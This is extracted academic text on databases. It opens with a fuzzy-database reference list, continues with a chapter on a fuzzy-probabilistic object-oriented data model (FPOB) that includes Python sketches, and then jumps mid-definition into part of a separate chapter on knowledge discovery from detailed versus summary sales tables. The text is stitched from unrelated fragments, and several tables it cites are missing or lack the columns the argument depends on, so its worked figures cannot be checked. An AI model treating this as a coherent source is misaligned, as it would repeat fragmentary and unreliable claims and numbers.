Shenoi, S., & Melton, A. (1992). Functional dependencies and normal forms in the fuzzy relational database model. Information Sciences, 60, 1-28. Sicilia, M. A., Barriocanal, E. D., & Gutierrez, J. A. (2004). Introducing fuzziness in existing orthogonal persistence interfaces and systems. In Advances in fuzzy object-oriented databases: Modeling and applications (pp. 241-268). Hershey, PA: Idea Group Publishing. Sicilia, M. A., Garcia, E., Diaz, P., & Aedo, I. (2002). Extending relational data access programming libraries for fuzziness: The fJDBC framework (LNCS 2522, pp. 314-328). Sicilia, M. A., Garcia, E., & Gutierrez, J. A. (2002). Integrating fuzziness in object oriented modeling language: Towards a fuzzy-UML. In Proceedings of the 2002 International Conference on Fuzzy Sets Theory and Its Applications (pp. 66-67).
Smets, P. (1997). Imperfect information: Imprecision-uncertainty. In Uncertainty management in information systems: From needs to solutions (pp. 225-254). Kluwer Academic Publishers.
notation to manage fuzzy datasets. In Proceedings of the 8th International Conference on Information Processing and Management of Uncertainty in Knowledge-Based Systems (pp. 1131-1138).
Sözat, M. I., & Yazici, A. (2001). A complete axiomatization for fuzzy functional and multivalued dependencies in fuzzy database relations. Fuzzy Sets and Systems, 117(2), 161-181.
Vila, M. A., Cubero, J. C., Medina, J. M., & Pons, O. (1996). A conceptual approach for deal with imprecision and uncertainty in object-based data models. International Journal of Intelligent Systems, 11, 791-806.
Takahashi, Y. (1991). A fuzzy query language for relational databases. IEEE Transactions on Systems, Man and Cybernetics, 21(6), 1576-1579. Takahashi, Y. (1993). Fuzzy database query languages and their relational completeness theorem. IEEE Transactions on Knowledge and Data Engineering, 5(1), 122-125. Tripathy, R. C., & Sakena, P. C. (1990). Multivalued dependencies in fuzzy relational databases. Fuzzy Sets and Systems, 38(3), 267-279. Umano, M., & Fukami, S. (1994). Fuzzy relational algebra for possibility-distribution-fuzzy-relational model of fuzzy data. Journal of Intelligent Information Systems, 3, 7-27. Umano, M., Imada, T., Hatono, I., & Tamura, H. (1998). Fuzzy object-oriented databases and implementation of its SQL-type data manipulation language. In Proceedings of the 1998 IEEE International Conference on Fuzzy Systems (Vol. 2, pp. 1344-1349). van Gyseghem, N. V., & de Caluwe, R. (1998). Imprecision and uncertainty in UFO database model. Journal of the American Society for Information Science, 49(3), 236-252. Vandenberghe, R. M. (1991). An extended entityrelationship model for fuzzy databases based on fuzzy truth values. In Proceedings of the 4th International Fuzzy Systems Association World Congress (pp. 280-283). Vert, G., Morris, A., Stock, M., & Jankowski, P. (2000). Extending entity-relationship modeling
Yang, Q., Zhang, W. N., Liu, C. W., Wu, J., Yu, C. T., Nakajima, H., & Rishe, N. (2001). Efficient processing of nested fuzzy SQL queries in a fuzzy database. IEEE Transactions on Knowledge and Data Engineering, 13(6), 884-901. Yazici, A., & Cibiceli, D. (1999). An access structure for similarity-based databases. Information Sciences, 115(1-4), 137-163. Yazici, A., & George, R. (1999). Fuzzy database modeling. Physica-Verlag. Yazici, A., & Koyuncu, M. (1997). Fuzzy objectoriented database modeling coupled with fuzzy logic. Fuzzy Sets and Systems, 89(1), 1-26. Yazici, A., & Sozat, M. I. (1998). The integrity constraints for similarity-based fuzzy relational databases. International Journal of Intelligent Systems, 13(7), 641-660. Yazici, A., Buckles, B. P., & Petry, F. E. (1992). A survey of conceptual and logical data models for uncertainty management. In Fuzzy logic for management of uncertainty (pp. 607-644). John Wiley and Sons Inc. Yazici, A., Buckles, B. P., & Petry, F. E. (1999). Handling complex and uncertain information in the ExIFO and NF2 data models. IEEE Transactions on Fuzzy Systems, 7(6), 659-676. Yazici, A., George, R., & Aksoy, D. (1998). Design and implementation issues in the fuzzy object-oriented data model. Information Sciences, 108(1-4), 241-260.
Yazici, A., Ince, C., & Koyuncu, M. (2004). An indexing technique for similarity-based fuzzy object-oriented data model (LNAI 3055, pp. 334-347). Yazici, A., Soysal, A., Buckles, B. P., & Petry, F. E. (1999). Uncertainty in a nested relational database model. Data & Knowledge Engineering, 30(3), 275-301. Zadeh, L. A. (1965). Fuzzy sets. Information and Control, 8(3), 338-353.
Zadeh, L. A. (1978). Fuzzy sets as a basis for a theory of possibility. Fuzzy Sets and Systems, 1(1), 3-28. Zhang, W. N., & Wang, K. (2000). An efficient evaluation of a fuzzy equi-join using fuzzy equality indicators. IEEE Transactions on Knowledge and Data Engineering, 12(2), 225-237. Zvieli, A., & Chen, P. P. (1986). Entity-relationship modeling and fuzzy databases. In Proceedings of the 1986 IEEE International Conference on Data Engineering (pp. 320-327).
This work was previously published in Intelligent Databases: Technologies and Applications, edited by Z. Ma, pp. 167-196, copyright 2007 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
Chapter 1.8
Fuzzy and Probabilistic Object-Oriented Databases Tru H. Cao Ho Chi Minh City University of Technology, Vietnam
INTRODUCTION
For modeling real-world problems and constructing intelligent systems, integration of different methodologies and techniques has been the quest and focus of significant interdisciplinary research effort. The advantage of such a hybrid system is that the strengths of its partners are combined and complement each other's weaknesses. In particular, object orientation provides a hierarchical data abstraction scheme and a mechanism for information hiding and inheritance. However, the classical object-oriented data model cannot deal with the uncertainty and imprecision pervasive in real-world problems. Meanwhile, probability theory and fuzzy logic provide measures and rules for representing and reasoning with uncertainty and imprecision. That has led to intensive research and development of fuzzy and probabilistic object-oriented databases, as collectively reported in De Caluwe (1997), Ma (2005), and Marín and Vila (2007).
BACKGROUND

The key issues in research on extending the classical object-oriented data models to deal with uncertainty and imprecision are:

1. Modeling partial subclass relationship.
2. Definition of partial class membership.
3. Representation of uncertain and/or imprecise attribute values.
4. Representation and execution of class methods.
5. Expression of partial applicability of class properties.
6. Mechanism for inheritance under uncertainty and imprecision.
In the classical object-oriented data model, a class hierarchy defines the subclass/super-class relation on classes. A class A is derived as a subclass of a class B, which is then called A’s superclass, either by narrowing the crisp value ranges of B’s attributes or by adding new properties to
B's ones. In the probabilistic and fuzzy case, due to the uncertain applicability of class properties or the imprecision of attribute value ranges, the inclusion between classes naturally becomes graded, which could be computed on the basis of the value ranges of their common attributes (George, Buckles, & Petry, 1993; Rossazza, Dubois, & Prade, 1997). As discussed in Baldwin, Cao, Martin, and Rossiter (2000), a set of classes with a graded inclusion or inheritance relation actually forms a network rather than a hierarchy, because if a class A has some inclusion degree into a class B based on a fuzzy matching of their descriptions, then B usually also has some inclusion degree into A. Moreover, a concept is naturally classified into sub-concepts that are totally subsumed by it, though the sub-concepts can overlap each other, as assumed in Dubitzky, Büchner, Hughes, and Bell (1999), for instance. Uncertain and imprecise attribute values lead to partial membership of an object into a class, and different measures have been proposed. Yazici and George (1999), for instance, defined for each class a membership function on a set of objects. Bordogna, Pasi, and Lucarella (1999) used linguistic labels to express the strength of the link of an object to a class. Dubitzky et al. (1999) defined membership as similarity degrees between objects and classes. Blanco, Marín, Pons, and Vila (2001) mentioned different measures, including probabilistic ones, to be used for membership degrees. Nevertheless, it remains to be answered how measures of different meanings, such as possibility and probability, on various levels of a model are integrated coherently. Most of the works on fuzzy object-oriented data models referred to in this paper were mainly based on fuzzy set and possibility theories, and used fuzzy sets or possibility distributions to represent imprecise attribute values. Bordogna, Pasi, and Lucarella (1999) and Blanco et al. (2001) also modeled uncertainty about an attribute having a particular value. However,
much less attention was given to uncertainty over a set of values of an attribute and to a foundation for combining probability degrees and fuzzy sets in the same model. While class attributes received much attention and treatment, class methods, as common in object-oriented systems for modeling object behaviors and parameterized properties, were often neglected. In Dubitzky et al. (1999) and Blanco et al. (2001) methods were not considered. Bordogna, Pasi, and Lucarella (1999) mentioned methods but did not provide a formal representation and explicit manipulation of them in their model. In Yazici (1999) and Cao and Rossiter (2003) methods were formally defined as Horn clauses and executed as a reasoning process, which is thus declarative and deductive, in contrast to imperative and procedural models. In the classical object-oriented data model, the properties that represent a class are necessary and sufficient to define the class. However, there is no commonly agreed set of defining properties for many natural, scientific, artificial, and ontological concepts. Arguing for flexible modeling, Van Gyseghem and De Caluwe (1997) introduced the notion of fuzzy property as an intermediate between the two extreme notions of required property and optional property, each of which was associated with a possibility degree of applicability of the property to the class. Meanwhile, Dubitzky et al. (1999) addressed the issue by contrasting the prototype concept model with the classical one, assuming each property of a concept to have a probability degree of occurring in exemplars of that concept. We note the distinction between the notion of uncertain property values and that of uncertain property applicability. In the former case, an object surely has a particular property but it is not certain which value among a given set the property takes. Meanwhile, in the latter, it is not even certain whether the object has that property. For example, “John owns a car whose brand is probably BMW” and “It is likely that John owns
a car” express different levels of uncertainty. In Bordogna, Pasi, and Lucarella (1999), Blanco et al. (2001), and Cao and Rossiter (2003), the two levels were mixed. Uncertain class membership and uncertain property applicability naturally result in uncertain inheritance of class properties. This was not considered in Bordogna, Pasi, and Lucarella (1999), Dubitzky et al. (1999), and Yazici and George (1999). In Blanco et al. (2001), class membership degrees were used as thresholds to determine what part of the properties in a class would be inherited. In Cao and Rossiter (2003), both membership of an object into a class and applicability of a property to the class were represented by support pairs (Baldwin, Lawry & Martin, 1996) and combined into the support pair for the object to inherit the property. Recently, Cross (2003) reviewed existing proposals and presented recommendations for the application of fuzzy set theory in a flexible generalized object model. Furthermore, De Tré and De Caluwe (2005) focused on representing data as constraints on object attributes and query answering as constraint satisfaction. For realization of fuzzy object-oriented data models, Berzal et al. (2005) were concerned with implementation of their model on an existing platform. Meanwhile, Fril++, a fuzzy object-oriented logic programming language, was also developed in Rossiter and Cao (2005). While the fuzzy object-oriented data models referred in this paper were mainly based on fuzzy set and possibility theories, Eiter, Lu, Lukasiewicz, and Subrahmanian (2001) introduced a probabilistic model to handle object bases with uncertainty, called POB (Probabilistic Object Base). For a POB class hierarchy, although a class was assumed to be fully included in its super-classes, the model specified the conditional probability for an object of a class belonging to each of its subclasses. Intuitively, it specified how likely an object of a class belonged to a subclass of that class. Accordingly, the partial class membership
was measured by probability degrees. For each attribute of an object, uncertainty about its value was represented by lower bound and upper bound probability distributions on a set of values. The authors also developed a full-fledged algebra to query and operate on object bases. However, the two major shortcomings of the POB model are: (1) it does not allow imprecise attribute values; and (2) it does not consider class methods. For instance, in the Plant example therein, the values of the attribute sun light are chosen to be only enumerated symbols such as mild, medium, and heavy without any interpretation. Meanwhile, in practice, those linguistic values are inherently vague and imprecise over degrees of sun light. Moreover, without an interpretation, they cannot be measured and their probability distributions cannot be calculated.
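To make the POB representation concrete, the following is a minimal sketch of our own (not code from Eiter et al.): an attribute whose uncertain value is constrained by lower and upper bound probability distributions over an enumerated set of symbols. The attribute name and its values echo the Plant example mentioned above; the numeric bounds are invented for illustration.

```python
# A minimal illustration of POB-style uncertain attribute values:
# the value of an attribute is constrained by a lower and an upper
# bound probability distribution over an enumerated set of symbols.

class UncertainAttribute:
    def __init__(self, values, lower, upper):
        # lower[v] <= P(attribute = v) <= upper[v] for every v in values
        self.values = list(values)
        self.lower = dict(lower)
        self.upper = dict(upper)

    def is_consistent(self):
        # Some probability assignment must exist within the bounds:
        # each interval must be well formed and the bounds must allow
        # the probabilities to sum to 1.
        ok_intervals = all(0.0 <= self.lower[v] <= self.upper[v] <= 1.0
                           for v in self.values)
        return (ok_intervals
                and sum(self.lower.values()) <= 1.0
                and sum(self.upper.values()) >= 1.0)

    def prob_bounds(self, subset):
        # Conservative bounds on P(attribute in subset) implied by the
        # per-value bounds.
        lo = sum(self.lower[v] for v in subset)
        hi = min(1.0, sum(self.upper[v] for v in subset))
        return max(0.0, lo), hi

# Hypothetical figures for the Plant example: without an interpretation
# of "mild", "medium", "heavy", only such enumerated bounds can be stated.
sun_light = UncertainAttribute(
    ["mild", "medium", "heavy"],
    lower={"mild": 0.2, "medium": 0.3, "heavy": 0.1},
    upper={"mild": 0.5, "medium": 0.6, "heavy": 0.4},
)
print(sun_light.is_consistent())                   # True
print(sun_light.prob_bounds({"mild", "medium"}))   # (0.5, 1.0)
```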
A HYBRID MODEL
In Cao and Nguyen (2007) and Nguyen and Cao (2007), POB is extended with fuzzy attribute values, class methods, and uncertain applicability of class properties. Here, the term property is used to subsume both the terms attribute and method. This hybrid model is called FPOB (Fuzzy-Probabilistic Object Base). Figure 1 shows an FPOB hierarchy of patients, who are classified as being children, teenagers, or adults and, alternatively, as being out-patients or in-patients. Those subclasses of a class that are connected to a d node are mutually disjoint, and they form a cluster of that class. The value in [0, 1] associated with the link between a class and one of its immediate subclasses represents the probability for an object of the class belonging to that subclass. For instance, the hierarchy says 80% of patients are non-resident, while the remaining 20% are resident. As such, each object could be a member of a class with some probability. Basically, imprecise and uncertain values of an attribute are expressed by a fuzzy-probabilistic
Figure 1. An example FPOB class hierarchy: PATIENT with disjoint subclass clusters {CHILD, TEENAGER, ADULT} and {OUT_PATIENT, IN_PATIENT}, further specialized into subclasses such as OUT_TEENAGER and IN_ADULT, with probability-labelled links
triple of the form 〈V, α, β〉, where V is a set of fuzzy values, that is, those defined by fuzzy sets, and α and β are lower and upper bound probability distributions on V. For example, 〈{young, middle_aged}, .8u, 1.2u〉 represents that the probability for the age of a patient to be young or middle_aged is between 0.4 and 0.6, where young and middle_aged are linguistic labels of fuzzy sets, and u denotes the uniform distribution. For a unified treatment of class attributes and methods, an attribute could be considered as a special method with a fixed output, having no input argument. Alternatively, a method could be considered as a parameterized attribute, whose value depends on its input arguments. In other words, a method is a function from products of fuzzy-probabilistic triples to fuzzy-probabilistic triples. For example, a method could be defined for the class PATIENT to compute the total treatment cost of a patient, depending on the daily treatment cost, the patient's treatment duration, and insurance cover. Uncertain applicability of a class property in FPOB is expressed by a probability interval. For example, since not all patients may have a medical history recorded, that property might be defined with the interval [.8, 1], saying that at least 80% of patients have medical histories. For computation, a property value 〈V, α, β〉 associated with a probability interval [l, u] is assumed to be equivalent to the fuzzy-probabilistic triple
〈V, α⊗l, β⊗u〉, where ⊗ denotes a probabilistic conjunction operator (Lakshmanan et al., 1997; Ross & Subrahmanian, 2005). Let [l, u] be the applicability probability interval of a property P to a class c, and [x, y] be the membership probability interval of an object o into c. Then the applicability probability interval of P to o is defined to be [l, u] ⊗ [x, y]. For multiple uncertain inheritance, in the logic-based fuzzy and probabilistic object-oriented model in Cao (2001), each uncertainly applicable property was considered as a defeasible probabilistic logic rule, and then uncertain inheritance was resolved by probabilistic default reasoning. In FPOB, complex object structures, or types, can be recursively defined to be of the form τ = [P1(τ11, …, τ1n1): τ1 [l1, u1], …, Pk(τk1, …, τknk): τk [lk, uk]]. For each property Pi, τi and the τij (j from 1 to ni) are respectively the types of its output and input parameters, and [li, ui] is the applicability probability interval of the property to the class in which it is defined. Simple types are atomic types like real numbers and strings, or fuzzy sets on atomic types. Since complex object types can be so nested, one has the notion of path expressions. In particular, Pi is a path expression for the type τ aforementioned, and [li, ui] is its associated probability interval. Pi[li, ui] is called an uncertain path expression. Inductively, if λi is a path expression for τi with associated probability interval [lλi, uλi],
then Pi.λi is a path expression for τ, and [li, ui] ⊗ [lλi, uλi] is its associated probability interval. For a particular object, a fuzzy-probabilistic tuple value of the type τ is [P1(〈V11, α11, β11〉, …, 〈V1n1, α1n1, β1n1〉): 〈V1, α1, β1〉[l′1, u′1], …, Pk(〈Vk1, αk1, βk1〉, …, 〈Vknk, αknk, βknk〉): 〈Vk, αk, βk〉[l′k, u′k]], where 〈Vi, αi, βi〉 and 〈Vij, αij, βij〉 are fuzzy-probabilistic triples of types τi and τij (i from 1 to k and j from 1 to ni). Here, [l′i, u′i] specifies the uncertain applicability of Pi to that particular object, which is not necessarily the same as the default value [li, ui] for a generic object of the type τ. The most important database operation is selection. For FPOB, a fuzzy-probabilistic selection expression is inductively defined to be in one of the following forms:
1. x ∈ c, where x is an object variable and c is a class. This is to select those objects that belong to the class c.
2. x.λ, where x is an object variable and λ is a path expression. This is to select those objects to which the path expression λ is applicable.
3. x.λ θ v, where x is an object variable, λ is a path expression, θ is a binary relation from {=, ≠, ≤, …}
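To make the preceding definitions concrete, the following sketch of our own (not code from Cao and Nguyen) shows fuzzy-probabilistic triples and the combination of membership and applicability probability intervals; the independence strategy is used here as one possible choice of the probabilistic conjunction ⊗, and the interval values are hypothetical.

```python
# A sketch (ours) of FPOB-style fuzzy-probabilistic triples and of the
# combination of membership and applicability intervals.  The conjunction
# operator below is the independence strategy; other strategies from the
# probabilistic-conjunction literature could be plugged in instead.

def conj(interval1, interval2):
    """Probabilistic conjunction of two probability intervals (independence)."""
    (l1, u1), (l2, u2) = interval1, interval2
    return (l1 * l2, u1 * u2)

class FPTriple:
    """A fuzzy-probabilistic triple <V, alpha, beta>: a set of fuzzy values V
    with lower (alpha) and upper (beta) probability distributions over V."""
    def __init__(self, values, alpha, beta):
        self.values, self.alpha, self.beta = set(values), dict(alpha), dict(beta)

# The age example from the text: uniform distribution u over two labels,
# scaled by 0.8 (lower) and 1.2 (upper), i.e. each label gets [0.4, 0.6].
u = 0.5
age = FPTriple({"young", "middle_aged"},
               alpha={"young": 0.8 * u, "middle_aged": 0.8 * u},
               beta={"young": 1.2 * u, "middle_aged": 1.2 * u})

# Membership of an object o in class c and applicability of property P to c
# are both probability intervals (hypothetical figures); the applicability
# of P to o is their probabilistic conjunction.
membership_o_in_c = (0.8, 1.0)
applicability_P_to_c = (0.8, 1.0)
print(conj(membership_o_in_c, applicability_P_to_c))   # (0.64, 1.0)
```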
Incorrect Knowledge Discovery from Detailed Data
If Product Color = Blue and Store Size > 5000 Then Profitable = Yes CF=100%
The results indicate that blue products in larger stores are profitable; however, they do not tell us the amounts of the profits which can go one way or another. Now, consider Table 2, where the third row in Table 1 is changed. Rules 1 and 2 are also true in Table 2. That is, from a probability point of view, Tables 1 and 2 produce the same results. However, this is not true when we look at the summary Tables 3 and 4, which are the summary tables based on Tables 1 and 2, respectively. Table 3 tells us that Blue color product is profitable and
In general, summary data (aggregation) is never found in the operational environment. Without a discovery process on summary data, we may discover incorrect knowledge from detailed operational data. Discovering a rule based just on current detail data may not depict the actual trends in the data. The problem is that statistical significance is usually used in determining the
Table 1. Sample sales data
Product   Product Color
Jacket    Blue
Jacket    Blue
Jacket    Blue
Hat       Green
Hat       Green
Hat       Green
Glove     Green
Glove     Blue
Glove     Green

Table 4. Summary sales table based on Table 2
Product Color   Profit
Blue            -500
Green           1000
Table 4 tells us it is not. That is, in the summary tables, the probability behavior of these detailed tables begins to diverge and thus produces different results. We should be careful when we analyze the summary tables since we may get conflicting results when the discovered patterns from the summary tables are compared with the discovered patterns from detailed tables. In general, the probabilities are not enough when discovering knowledge from detailed data. We need summary data as well.
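As a concrete illustration of how a summary row is derived from detailed records, the sketch below (our own; the Store Size and Profit figures are invented, since those columns of the sample tables are not reproduced here) groups detailed rows by Product Color and sums Profit, which is essentially what an SQL GROUP BY over the sales table would compute, and contrasts that with a rule's confidence factor computed from record counts.

```python
# Sketch: deriving a summary table (profit by product color) from detailed
# sales records, and computing a rule's confidence from record counts.
from collections import defaultdict

detailed_sales = [
    # (product, color, store_size, profit) -- hypothetical figures
    ("Jacket", "Blue",  6000,  3000),
    ("Jacket", "Blue",  7000,  2500),
    ("Jacket", "Blue",  1000,  -400),
    ("Hat",    "Green", 1000,  -300),
    ("Hat",    "Green", 6000,   800),
    ("Glove",  "Blue",  1000,  -200),
]

def summarize_by_color(rows):
    summary = defaultdict(int)
    for _product, color, _size, profit in rows:
        summary[color] += profit
    return dict(summary)

def rule_confidence(rows, condition, conclusion):
    """Confidence of 'If condition Then conclusion' over detailed rows."""
    matching = [r for r in rows if condition(r)]
    if not matching:
        return None
    return sum(1 for r in matching if conclusion(r)) / len(matching)

print(summarize_by_color(detailed_sales))
# {'Blue': 4900, 'Green': 500}
print(rule_confidence(detailed_sales,
                      condition=lambda r: r[1] == "Blue",
                      conclusion=lambda r: r[3] > 0))
# 0.5 -- the rule's confidence (record counts) can tell a different story
# than the aggregated profit in the summary table.
```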
Incorrect Knowledge Discovery from Summary Data
In knowledge discovery, we believe that it is critical to use summary tables to discover patterns that could not otherwise be discovered from operational detailed databases. Knowledge discovery on detailed data is based on statistical significance (it uses probability), which may not detect all patterns, or may produce incorrect results, as we noted in the previous section. Knowledge discovery on summary tables could improve the overall data mining process and prevent incorrect knowledge discovery. Summary tables have hidden patterns that can be discovered. For example, Table 3 tells us that Blue products are profitable. Such discovered patterns can complement the discoveries from the detailed data (as part of the validation of the discovered knowledge, explained later). In general, for any given detailed data, there are numerous ways to summarize them. Each summarization or aggregation can be along one or more dimensions, as shown in Tables 3 and 4. Accurate knowledge, however, cannot be discovered just by processing the summary tables. The problem is that two different summarizations of the same dataset may produce the same result, or they may produce two different results. Therefore, it is extremely important that the users be able to access metadata (Adriaans & Zantinge, 1996) that tells
them exactly how each type of summarized data was derived, so they understand which dimensions have been summarized and to what level. Otherwise, we may discover inaccurate patterns from different summarized tables. For example, consider Tables 5 through 7, summarized/aggregated tables based on Table 1, which provide different and conflicting results. These tables show different results for the Green Hat product. In fact, it is the Green Hat in small stores (Store Size 1000) that loses money. This fact can only be discovered by looking at the different summary tables and knowing how they are created (i.e., using the metadata to see the SQL statements used to create the summarized/aggregated tables). Alternatively, we can combine the patterns discovered from the detailed data and the summary data to avoid discovering contradictory knowledge (as explained in the following discussion). As we noted, summary tables greatly enhance the performance of information retrieval in a large volume database environment (Barquin & Edelstein, 1997). There are, however, several problems associated with creating and maintaining the summary tables. First, in most databases, it is physically impossible to create all the summary tables required to support all possible queries. For the general case, given N items (or columns) on an axis of a cross-tabular report, there are 2^N − 1 possible ways of combining the items. The number of aggregate rows required depends on the number of valid combinations of item values, and the situation is complicated further when the items are in a multilevel hierarchy (i.e., with Month rolling up to Quarter and Year). However, there are pruning techniques that can be employed; for example, specifying which combinations of dimensions or levels do not make business sense to combine (using metadata and available domain knowledge gathered from a domain expert), and not aggregating at all levels, allowing some minimal aggregation from a lower level where required.
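The combinatorial blow-up can be made explicit with a few lines of code (a sketch of ours): for N candidate dimensions there are 2^N − 1 non-empty subsets along which one could aggregate, before any hierarchy levels are considered; the pruning rule at the end is a hypothetical domain constraint.

```python
# Sketch: enumerating the 2^N - 1 possible grouping-column combinations
# for a cross-tabular report with N items (dimensions).
from itertools import combinations

def grouping_sets(dimensions):
    """All non-empty subsets of the dimensions, i.e. 2^N - 1 candidate summaries."""
    sets = []
    for k in range(1, len(dimensions) + 1):
        sets.extend(combinations(dimensions, k))
    return sets

dims = ["Product", "Product Color", "Store Size", "Month"]
candidates = grouping_sets(dims)
print(len(candidates))        # 15 == 2**4 - 1
for g in candidates[:4]:
    print(g)                  # ('Product',), ('Product Color',), ...

# Pruning: drop combinations that make no business sense, e.g. those that
# summarize Store Size without Product (a hypothetical domain rule).
pruned = [g for g in candidates
          if not ("Store Size" in g and "Product" not in g)]
print(len(pruned))
```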
Table 5. Summary sales table based on Table 1
Product   Product Color   Profit
Glove     Blue            -300
Glove     Green           1800
Hat       Green           -800
Jacket    Blue            6700

Table 6. Summary sales table based on Table 1
Product   Product Color   Profit
Glove     Blue            2000
Hat       Green           300
Jacket    Blue            -200

Table 7. Summary sales table based on Table 1
Product   Product Color   Profit
Glove     Blue            -300
Glove     Green           -200
Hat       Green           -1100
Jacket    Blue            6900

Second, there is also a possibility that information is lost or distorted as summary tables are created. For example, consider a retail data warehouse where Monday to Friday sales are exceptionally low for some stores, while weekend sales are exceptionally high for others. The summarization of daily sales data to weekly amounts will totally hide the fact that weekdays are “money losers,” while weekends are “money makers” for some stores. In other words, key pieces of information are often lost through summarization, and there is no way to recover them by further analysis. Finally, another key issue is the maintenance of the summary tables to keep them up to date, and ensuring that the summary tables are consistent with each other and the detailed data. Once the summary tables have been created, they need to be refreshed at regular intervals as the base data
(detailed data) gets refreshed. We need to use an incremental scheme for maintaining summary tables efficiently (Barquin & Edelstein, 1997; Bischoff & Alexander, 1997).
Validating Possible Incorrect Discovered Knowledge As we showed in the previous section, knowledge discovery based on just the detailed tables may lead to incorrect discovery since the discovered knowledge is based on statistical significance. Such statistical significance represents the probability that is based on the occurrences of the records in which certain attributes satisfy some specific conditions. Summary tables have hidden patterns that can be discovered. Such patterns provide the relationships between certain attri-
butes based on their actual values as well as on the statistical significance. Therefore, we propose to use the patterns discovered from the summary tables to validate the discovered knowledge from the detailed tables. Our proposed scheme identifies the following cases for validating possible incorrect/correct discovered rules.

Table 8. Sample sales data
Product   Product Color   Product Price
Jacket    Blue            200
Jacket    Blue            200
Jacket    Blue            200
Hat       Green           70
Hat       Green           70
Hat       Green           70
Glove     Green           50
Glove     Blue            50
Glove     Green           50

• Case 1: If the discovered pattern from the summary tables completely supports the discovered knowledge from the detailed tables, then we have more confidence in the accuracy of the discovered knowledge. For instance, consider Table 8, where the third row in Table 2 is changed such that profit = -100. From Table 8 we can discover that: If Product Color = Blue Then Profitable = No CF=100% (4 records out of 4)
By looking at Table 9, which is a summary table based on Table 8, we can discover that the Blue color product provides no profit (negative profit). So, the detailed and summary tables produce the same results. Consequently, we have more confidence in the discovered knowledge.
Table 9. Summary sales table based on Table 8
Product Color   Profit
Blue            -700
Green           1000

• Case 2: The patterns discovered from the detailed and summary tables support each other, but they have different confidence factors. For example, from Table 2, we discover that: If Product Color = Blue Then Profitable = No CF=75% (3 records out of 4).
From Table 4, we discover that Blue color product is not profitable (CF = 100%, Profit = -500). Since the discovered patterns on the summary tables are based on the actual values, they represent more reliable information compared to the discovered patterns from the detailed tables which are based on the occurrences of the records.
In such cases, we cannot say that the discovered pattern is incorrect, but rather that it is not detailed enough to be considered an interesting pattern. Perhaps the hypothesis for discovering the pattern has to be expanded to include other attributes (i.e., Product or Store Size or both) in addition to the Product Color.
• Case 3: The patterns discovered from the detailed and summary tables contradict each other. For example, from Table 1, we discover that: If Product Color = Blue Then Profitable = No CF=75% (3 records out of 4).
From Table 3, we discover that the Blue color product is profitable (CF = 100%, Profit = 6400). The explanation is the same as the one provided for case 2.
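The three cases can be expressed as a small decision procedure (a sketch of ours, with sign conventions and the confidence threshold chosen for illustration): it compares the confidence of a detailed-data rule such as "If Product Color = Blue Then Profitable = No" with the sign of the aggregated profit in the corresponding summary row.

```python
# Sketch: validating a rule discovered on detailed data ("color X is not
# profitable", with some confidence factor) against the summary table
# (total profit for color X).  Thresholds are illustrative only.

def validate(rule_cf, summary_profit):
    """Return which of the three validation cases applies."""
    summary_says_unprofitable = summary_profit < 0
    rule_says_unprofitable = True          # the rule's conclusion
    if summary_says_unprofitable == rule_says_unprofitable:
        if rule_cf >= 1.0:
            return "Case 1: summary fully supports the rule (more confidence)"
        return "Case 2: supported, but with a different confidence factor"
    return "Case 3: detailed and summary patterns contradict each other"

# Blue products, using the figures quoted in the text:
print(validate(rule_cf=1.00, summary_profit=-700))   # Case 1 (Tables 8 and 9)
print(validate(rule_cf=0.75, summary_profit=-500))   # Case 2 (Tables 2 and 4)
print(validate(rule_cf=0.75, summary_profit=6400))   # Case 3 (Tables 1 and 3)
```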
Incomplete Knowledge Discovery
The traditional database design method is based on the notions of functional dependencies and lossless decomposition of relations into third normal form. However, this decomposition of relations is not useful with respect to knowledge discovery because it hides dependencies among attributes that might be of some interest (Adriaans &
Zantinge, 1996). To provide maximum guarantee that potentially interesting statistical dependencies are preserved, the knowledge discovery process should use the universal relation (Chiang, Barron, & Storey, 1994; Date, 2000; Maier, 1983; Parsaye & Chignell, 1999) as opposed to normalized relations. In the following example, we show that knowledge discovery on normalized relations may not reveal all the interesting patterns. Consider the relations Sales and Region (Adriaans & Zantinge, 1996) in Figure 3, which are in third normal form. Figure 4 shows the universal relation, which is the join of the two tables in Figure 3. From Figure 4, we can discover a relationship between the Average House Price and the type of Products Purchased by people. Such a relationship is not as obvious in the normalized relations in Figure 3. This example shows that knowledge discovery on “well designed” (i.e., 3NF) databases, according to the normalization techniques, could lead to incomplete knowledge discovery.
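The effect can be reproduced in a few lines (our own sketch of the Sales/Region example from Figures 3 and 4): only after joining the two normalized relations does the co-occurrence of a high Average House Price with Wine purchases become visible to a single-relation discovery step.

```python
# Sketch: joining the normalized Sales and Region relations of Figure 3
# into the universal relation of Figure 4, and counting a cross-relation
# pattern (Average House Price vs. Product Purchased) that a per-relation
# discovery process would miss.
from collections import Counter

sales = [  # (client_number, zip_code, product_purchased)
    ("1111", "11111", "Wine"),
    ("2222", "22222", "Bread"),
    ("3333", "11111", "Wine"),
    ("4444", "33333", "Wine"),
    ("5555", "44444", "Wine"),
]
region = {  # zip_code -> (city, average_house_price)
    "11111": ("Paris", "High"),
    "22222": ("Peking", "Low"),
    "33333": ("New York", "High"),
    "44444": ("Moscow", "High"),
}

universal = [(c, z) + region[z] + (p,) for (c, z, p) in sales]

# Co-occurrence of house-price level and product, visible only after the join:
pattern = Counter((row[3], row[4]) for row in universal)
print(pattern)   # Counter({('High', 'Wine'): 4, ('Low', 'Bread'): 1})
```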
Validating Possible Incomplete Discovered Knowledge Every decomposition involves a potential information loss that has to be analyzed and quantified, and traditional techniques from statistics and machine learning (minimum description length)
Figure 3. Relational database in third normal form

Sales
Client Number   Zip Code   Product Purchased
1111            11111      Wine
2222            22222      Bread
3333            11111      Wine
4444            33333      Wine
5555            44444      Wine

Region
Zip Code   City       Average House Price
11111      Paris      High
22222      Peking     Low
33333      New York   High
44444      Moscow     High
Figure 4. Universal relation, join of the tables in Figure 3

Sales / Region
Client Number   Zip Code   City       Average House Price   Product Purchased
1111            11111      Paris      High                  Wine
2222            22222      Peking     Low                   Bread
3333            11111      Paris      High                  Wine
4444            33333      New York   High                  Wine
5555            44444      Moscow     High                  Wine
